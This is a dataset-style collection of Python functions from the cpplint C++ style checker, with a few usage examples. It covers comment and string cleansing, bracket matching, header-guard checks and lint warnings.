  self.in_a_function = False
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def __init__(self, filename):
  self._filename = filename
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def RepositoryName(self):
  """FullName after removing the local path to the repository.

  If we have a real absolute path name here we can try to do something smart:
  detecting the root of the checkout and truncating /path/to/checkout from
  the name so that we get header guards that don't include things like
  "C:\Documents and Settings\..." or "/home/username/..." in them and thus
  people on different computers who have checked the source out to different
  locations won't see bogus errors.
  """
  fullname = self.FullName()

  if os.path.exists(fullname):
    project_dir = os.path.dirname(fullname)

    if os.path.exists(os.path.join(project_dir, ".svn")):
      # If there's a .svn file in the current directory, we recursively look
      # up the directory tree for the top of the SVN checkout
      root_dir = project_dir
      one_up_dir = os.path.dirname(root_dir)
      while os.path.exists(os.path.join(one_up_dir, ".svn")):
        root_dir = os.path.dirname(root_dir)
        one_up_dir = os.path.dirname(one_up_dir)

      prefix = os.path.commonprefix([root_dir, project_dir])
      return fullname[len(prefix) + 1:]

    # Not SVN <= 1.6? Try to find a git, hg, or svn top level directory by
    # searching up from the current path.
    root_dir = os.path.dirname(fullname)
    while (root_dir != os.path.dirname(root_dir) and
           not os.path.exists(os.path.join(root_dir, ".git")) and
           not os.path.exists(os.path.join(root_dir, ".hg")) and
           not os.path.exists(os.path.join(root_dir, ".svn"))):
      root_dir = os.path.dirname(root_dir)

    if (os.path.exists(os.path.join(root_dir, ".git")) or
        os.path.exists(os.path.join(root_dir, ".hg")) or
        os.path.exists(os.path.join(root_dir, ".svn"))):
      prefix = os.path.commonprefix([root_dir, project_dir])
      return fullname[len(prefix) + 1:]

  # Don't know what to do; header guard warnings may be wrong...
  return fullname
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def BaseName(self):
  """File base name - text after the final slash, before the final period."""
  return self.Split()[1]
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def NoExtension(self):
  """File has no source file extension."""
  return '/'.join(self.Split()[0:2])
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def _ShouldPrintError(category, confidence, linenum):
  """If confidence >= verbose, category passes filter and is not suppressed."""
  # There are three ways we might decide not to print an error message:
  # a "NOLINT(category)" comment appears in the source,
  # the verbosity level isn't high enough, or the filters filter it out.
  if IsErrorSuppressedByNolint(category, linenum):
    return False

  if confidence < _cpplint_state.verbose_level:
    return False

  is_filtered = False
  for one_filter in _Filters():
    if one_filter.startswith('-'):
      if category.startswith(one_filter[1:]):
        is_filtered = True
    elif one_filter.startswith('+'):
      if category.startswith(one_filter[1:]):
        is_filtered = False
    else:
      assert False  # should have been checked for in SetFilter.
  if is_filtered:
    return False

  return True
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def IsCppString(line):
  """Does line terminate so, that the next symbol is in string constant.

  This function does not consider single-line nor multi-line comments.

  Args:
    line: is a partial line of code starting from the 0..n.
  Returns:
    True, if next character appended to 'line' is inside a
    string constant.
  """
  line = line.replace(r'\\', 'XX')  # after this, \\" does not match to \"
  return ((line.count('"') - line.count(r'\"') - line.count("'\"'")) & 1) == 1
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
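A few sample inputs make the parity check concrete: IsCppString only counts unescaped double quotes (and discounts the '"' character literal), so an odd count means the line ends inside a string:

```python
print(IsCppString('x = "abc'))     # -> True: one unescaped quote, still open
print(IsCppString('x = "abc"'))    # -> False: the string is closed
print(IsCppString(r'x = "a\"b'))   # -> True: the escaped quote is ignored
print(IsCppString("c = '\"'"))     # -> False: a double-quote char literal
```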
def FindNextMultiLineCommentStart(lines, lineix):
  """Find the beginning marker for a multiline comment."""
  while lineix < len(lines):
    if lines[lineix].strip().startswith('/*'):
      # Only return this marker if the comment goes beyond this line
      if lines[lineix].strip().find('*/', 2) < 0:
        return lineix
    lineix += 1
  return len(lines)
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def RemoveMultiLineCommentsFromRange(lines, begin, end):
  """Clears a range of lines for multi-line comments."""
  # Having // dummy comments makes the lines non-empty, so we will not get
  # unnecessary blank line warnings later in the code.
  for i in range(begin, end):
    lines[i] = '/**/'
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def CleanseComments(line):
  """Removes //-comments and single-line C-style /* */ comments.

  Args:
    line: A line of C++ source.
  Returns:
    The line with single-line comments removed.
  """
  commentpos = line.find('//')
  if commentpos != -1 and not IsCppString(line[:commentpos]):
    line = line[:commentpos].rstrip()
  # get rid of /* ... */
  return _RE_PATTERN_CLEANSE_LINE_C_COMMENTS.sub('', line)
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def __init__(self, lines):
  self.elided = []
  self.lines = []
  self.raw_lines = lines
  self.num_lines = len(lines)
  self.lines_without_raw_strings = CleanseRawStrings(lines)
  for linenum in range(len(self.lines_without_raw_strings)):
    self.lines.append(CleanseComments(
        self.lines_without_raw_strings[linenum]))
    elided = self._CollapseStrings(self.lines_without_raw_strings[linenum])
    self.elided.append(CleanseComments(elided))
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def _CollapseStrings(elided):
  """Collapses strings and chars on a line to simple "" or '' blocks.

  We nix strings first so we're not fooled by text like '"http://"'

  Args:
    elided: The line being processed.
  Returns:
    The line with collapsed strings.
  """
  if _RE_PATTERN_INCLUDE.match(elided):
    return elided

  # Remove escaped characters first to make quote/single quote collapsing
  # basic.  Things that look like escaped characters shouldn't occur
  # outside of strings and chars.
  elided = _RE_PATTERN_CLEANSE_LINE_ESCAPES.sub('', elided)

  # Replace quoted strings and digit separators.  Both single quotes
  # and double quotes are processed in the same loop, otherwise
  # nested quotes wouldn't work.
  collapsed = ''
  while True:
    # Find the first quote character
    match = Match(r'^([^\'"]*)([\'"])(.*)$', elided)
    if not match:
      collapsed += elided
      break
    head, quote, tail = match.groups()

    if quote == '"':
      # Collapse double quoted strings
      second_quote = tail.find('"')
      if second_quote >= 0:
        collapsed += head + '""'
        elided = tail[second_quote + 1:]
      else:
        # Unmatched double quote, don't bother processing the rest
        # of the line since this is probably a multiline string.
        collapsed += elided
        break
    else:
      # Found single quote, check nearby text to eliminate digit separators.
      #
      # There is no special handling for floating point here, because
      # the integer/fractional/exponent parts would all be parsed
      # correctly as long as there are digits on both sides of the
      # separator.  So we are fine as long as we don't see something
      # like "0.'3" (gcc 4.9.0 will not allow this literal).
      if Search(r'\b(?:0[bBxX]?|[1-9])[0-9a-fA-F]*$', head):
        match_literal = Match(r'^((?:\'?[0-9a-zA-Z_])*)(.*)$', "'" + tail)
        collapsed += head + match_literal.group(1).replace("'", '')
        elided = match_literal.group(2)
      else:
        second_quote = tail.find('\'')
        if second_quote >= 0:
          collapsed += head + "''"
          elided = tail[second_quote + 1:]
        else:
          # Unmatched single quote
          collapsed += elided
          break

  return collapsed
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
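In cpplint, _CollapseStrings is a @staticmethod on CleansedLines, so it can be exercised directly; the expected outputs below follow from the code above:

```python
# String literals collapse to "" so later regexes can't match inside them.
print(CleansedLines._CollapseStrings('printf("hello %s", name);'))
# -> printf("", name);

# Char literals collapse to ''.
print(CleansedLines._CollapseStrings("if (c == 'x') return;"))
# -> if (c == '') return;

# C++14 digit separators are stripped rather than treated as char quotes.
print(CleansedLines._CollapseStrings("int n = 1'000'000;"))
# -> int n = 1000000;
```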
def CloseExpression(clean_lines, linenum, pos):
  """If input points to ( or { or [ or <, finds the position that closes it.

  If lines[linenum][pos] points to a '(' or '{' or '[' or '<', finds the
  linenum/pos that correspond to the closing of the expression.

  TODO(unknown): cpplint spends a fair bit of time matching parentheses.
  Ideally we would want to index all opening and closing parentheses once
  and have CloseExpression be just a simple lookup, but due to preprocessor
  tricks, this is not so easy.

  Args:
    clean_lines: A CleansedLines instance containing the file.
    linenum: The number of the line to check.
    pos: A position on the line.
  Returns:
    A tuple (line, linenum, pos) pointer *past* the closing brace, or
    (line, len(lines), -1) if we never find a close.  Note we ignore
    strings and comments when matching; and the line we return is the
    'cleansed' line at linenum.
  """
  line = clean_lines.elided[linenum]
  if (line[pos] not in '({[<') or Match(r'<[<=]', line[pos:]):
    return (line, clean_lines.NumLines(), -1)

  # Check first line
  (end_pos, stack) = FindEndOfExpressionInLine(line, pos, [])
  if end_pos > -1:
    return (line, linenum, end_pos)

  # Continue scanning forward
  while stack and linenum < clean_lines.NumLines() - 1:
    linenum += 1
    line = clean_lines.elided[linenum]
    (end_pos, stack) = FindEndOfExpressionInLine(line, 0, stack)
    if end_pos > -1:
      return (line, linenum, end_pos)

  # Did not find end of expression before end of file, give up
  return (line, clean_lines.NumLines(), -1)
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
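CleansedLines (defined above) can drive CloseExpression directly. A tiny demo with a call split across two lines; the input snippet is made up, and this relies on cpplint's FindEndOfExpressionInLine helper, which this dump omits:

```python
lines = CleansedLines(['f(a,', '  b);'])
# Start from the '(' at line 0, column 1; the match is the ')' on line 1.
line, linenum, pos = CloseExpression(lines, 0, 1)
print(linenum, pos)  # -> 1 4, with pos pointing just past the closing ')'
```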
def ReverseCloseExpression(clean_lines, linenum, pos):
  """If input points to ) or } or ] or >, finds the position that opens it.

  If lines[linenum][pos] points to a ')' or '}' or ']' or '>', finds the
  linenum/pos that correspond to the opening of the expression.

  Args:
    clean_lines: A CleansedLines instance containing the file.
    linenum: The number of the line to check.
    pos: A position on the line.
  Returns:
    A tuple (line, linenum, pos) pointer *at* the opening brace, or
    (line, 0, -1) if we never find the matching opening brace.  Note
    we ignore strings and comments when matching; and the line we
    return is the 'cleansed' line at linenum.
  """
  line = clean_lines.elided[linenum]
  if line[pos] not in ')}]>':
    return (line, 0, -1)

  # Check last line
  (start_pos, stack) = FindStartOfExpressionInLine(line, pos, [])
  if start_pos > -1:
    return (line, linenum, start_pos)

  # Continue scanning backward
  while stack and linenum > 0:
    linenum -= 1
    line = clean_lines.elided[linenum]
    (start_pos, stack) = FindStartOfExpressionInLine(line, len(line) - 1, stack)
    if start_pos > -1:
      return (line, linenum, start_pos)

  # Did not find start of expression before beginning of file, give up
  return (line, 0, -1)
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def GetIndentLevel(line):
  """Return the number of leading spaces in line.

  Args:
    line: A string to check.
  Returns:
    An integer count of leading spaces, possibly zero.
  """
  indent = Match(r'^( *)\S', line)
  if indent:
    return len(indent.group(1))
  else:
    return 0
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def CheckForHeaderGuard(filename, clean_lines, error):
  """Checks that the file contains a header guard.

  Logs an error if no #ifndef header guard is present.  For other
  headers, checks that the full pathname is used.

  Args:
    filename: The name of the C++ header file.
    clean_lines: A CleansedLines instance containing the file.
    error: The function to call with any errors found.
  """
  # Don't check for header guards if there are error suppression
  # comments somewhere in this file.
  #
  # Because this is silencing a warning for a nonexistent line, we
  # only support the very specific NOLINT(build/header_guard) syntax,
  # and not the general NOLINT or NOLINT(*) syntax.
  raw_lines = clean_lines.lines_without_raw_strings
  for i in raw_lines:
    if Search(r'//\s*NOLINT\(build/header_guard\)', i):
      return

  cppvar = GetHeaderGuardCPPVariable(filename)

  ifndef = ''
  ifndef_linenum = 0
  define = ''
  endif = ''
  endif_linenum = 0
  for linenum, line in enumerate(raw_lines):
    linesplit = line.split()
    if len(linesplit) >= 2:
      # find the first occurrence of #ifndef and #define, save arg
      if not ifndef and linesplit[0] == '#ifndef':
        # set ifndef to the header guard presented on the #ifndef line.
        ifndef = linesplit[1]
        ifndef_linenum = linenum
      if not define and linesplit[0] == '#define':
        define = linesplit[1]
    # find the last occurrence of #endif, save entire line
    if line.startswith('#endif'):
      endif = line
      endif_linenum = linenum

  if not ifndef or not define or ifndef != define:
    error(filename, 0, 'build/header_guard', 5,
          'No #ifndef header guard found, suggested CPP variable is: %s' %
          cppvar)
    return

  # The guard should be PATH_FILE_H_, but we also allow PATH_FILE_H__
  # for backward compatibility.
  if ifndef != cppvar:
    error_level = 0
    if ifndef != cppvar + '_':
      error_level = 5

    ParseNolintSuppressions(filename, raw_lines[ifndef_linenum], ifndef_linenum,
                            error)
    error(filename, ifndef_linenum, 'build/header_guard', error_level,
          '#ifndef header guard has wrong style, please use: %s' % cppvar)

  # Check for "//" comments on endif line.
  ParseNolintSuppressions(filename, raw_lines[endif_linenum], endif_linenum,
                          error)
  match = Match(r'#endif\s*//\s*' + cppvar + r'(_)?\b', endif)
  if match:
    if match.group(1) == '_':
      # Issue low severity warning for deprecated double trailing underscore
      error(filename, endif_linenum, 'build/header_guard', 0,
            '#endif line should be "#endif // %s"' % cppvar)
    return

  # Didn't find the corresponding "//" comment.  If this file does not
  # contain any "//" comments at all, it could be that the compiler
  # only wants "/**/" comments, look for those instead.
  no_single_line_comments = True
  for i in xrange(1, len(raw_lines) - 1):
    line = raw_lines[i]
    if Match(r'^(?:(?:\'(?:\.|[^\'])*\')|(?:"(?:\.|[^"])*")|[^\'"])*//', line):
      no_single_line_comments = False
      break

  if no_single_line_comments:
    match = Match(r'#endif\s*/\*\s*' + cppvar + r'(_)?\s*\*/', endif)
    if match:
      if match.group(1) == '_':
        # Low severity warning for double trailing underscore
        error(filename, endif_linenum, 'build/header_guard', 0,
              '#endif line should be "#endif /* %s */"' % cppvar)
      return

  # Didn't find anything
  error(filename, endif_linenum, 'build/header_guard', 5,
        '#endif line should be "#endif // %s"' % cppvar)
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def CheckForBadCharacters(filename, lines, error):
  """Logs an error for each line containing bad characters.

  Two kinds of bad characters:
  1. Unicode replacement characters: These indicate that either the file
     contained invalid UTF-8 (likely) or Unicode replacement characters (which
     it shouldn't).  Note that it's possible for this to throw off line
     numbering if the invalid UTF-8 occurred adjacent to a newline.
  2. NUL bytes.  These are problematic for some tools.

  Args:
    filename: The name of the current file.
    lines: An array of strings, each representing a line of the file.
    error: The function to call with any errors found.
  """
  for linenum, line in enumerate(lines):
    if u'\ufffd' in line:
      error(filename, linenum, 'readability/utf8', 5,
            'Line contains invalid UTF-8 (or Unicode replacement character).')
    if '\0' in line:
      error(filename, linenum, 'readability/nul', 5, 'Line contains NUL byte.')
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def CheckForMultilineCommentsAndStrings(filename, clean_lines, linenum, error):
  """Logs an error if we see /* ... */ or "..." that extend past one line.

  /* ... */ comments are legit inside macros, for one line.
  Otherwise, we prefer // comments, so it's ok to warn about the
  other.  Likewise, it's ok for strings to extend across multiple
  lines, as long as a line continuation character (backslash)
  terminates each line.  Although not currently prohibited by the C++
  style guide, it's ugly and unnecessary.  We don't do well with either
  in this lint program, so we warn about both.

  Args:
    filename: The name of the current file.
    clean_lines: A CleansedLines instance containing the file.
    linenum: The number of the line to check.
    error: The function to call with any errors found.
  """
  line = clean_lines.elided[linenum]

  # Remove all \\ (escaped backslashes) from the line. They are OK, and the
  # second (escaped) slash may trigger later \" detection erroneously.
  line = line.replace('\\\\', '')

  if line.count('/*') > line.count('*/'):
    error(filename, linenum, 'readability/multiline_comment', 5,
          'Complex multi-line /*...*/-style comment found. '
          'Lint may give bogus warnings.  '
          'Consider replacing these with //-style comments, '
          'with #if 0...#endif, '
          'or with more clearly structured multi-line comments.')

  if (line.count('"') - line.count('\\"')) % 2:
    error(filename, linenum, 'readability/multiline_string', 5,
          'Multi-line string ("...") found.  This lint script doesn\'t '
          'do well with such strings, and may give bogus warnings.  '
          'Use C++11 raw strings or concatenation instead.')
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def CheckPosixThreading(filename, clean_lines, linenum, error):
  """Checks for calls to thread-unsafe functions.

  Much code has been originally written without consideration of
  multi-threading.  Also, engineers are relying on their old experience;
  they have learned posix before threading extensions were added.  These
  tests guide the engineers to use thread-safe functions (when using
  posix directly).

  Args:
    filename: The name of the current file.
    clean_lines: A CleansedLines instance containing the file.
    linenum: The number of the line to check.
    error: The function to call with any errors found.
  """
  line = clean_lines.elided[linenum]
  for single_thread_func, multithread_safe_func, pattern in _THREADING_LIST:
    # Additional pattern matching check to confirm that this is the
    # function we are looking for
    if Search(pattern, line):
      error(filename, linenum, 'runtime/threadsafe_fn', 2,
            'Consider using ' + multithread_safe_func +
            '...) instead of ' + single_thread_func +
            '...) for improved thread safety.')
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def CheckInvalidIncrement(filename, clean_lines, linenum, error):
  """Checks for invalid increment *count++.

  For example following function:
  void increment_counter(int* count) {
    *count++;
  }
  is invalid, because it effectively does count++, moving pointer, and should
  be replaced with ++*count, (*count)++ or *count += 1.

  Args:
    filename: The name of the current file.
    clean_lines: A CleansedLines instance containing the file.
    linenum: The number of the line to check.
    error: The function to call with any errors found.
  """
  line = clean_lines.elided[linenum]
  if _RE_PATTERN_INVALID_INCREMENT.match(line):
    error(filename, linenum, 'runtime/invalid_increment', 5,
          'Changing pointer instead of value (or unused value of operator*).')
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def IsForwardClassDeclaration(clean_lines, linenum):
  return Match(r'^\s*(\btemplate\b)*.*class\s+\w+;\s*$', clean_lines[linenum])
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def __init__(self, seen_open_brace):
  self.seen_open_brace = seen_open_brace
  self.open_parentheses = 0
  self.inline_asm = _NO_ASM
  self.check_namespace_indentation = False
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def CheckEnd(self, filename, clean_lines, linenum, error):
  """Run checks that applies to text after the closing brace.

  This is mostly used for checking end of namespace comments.

  Args:
    filename: The name of the current file.
    clean_lines: A CleansedLines instance containing the file.
    linenum: The number of the line to check.
    error: The function to call with any errors found.
  """
  pass
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def __init__(self):
  _BlockInfo.__init__(self, True)
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |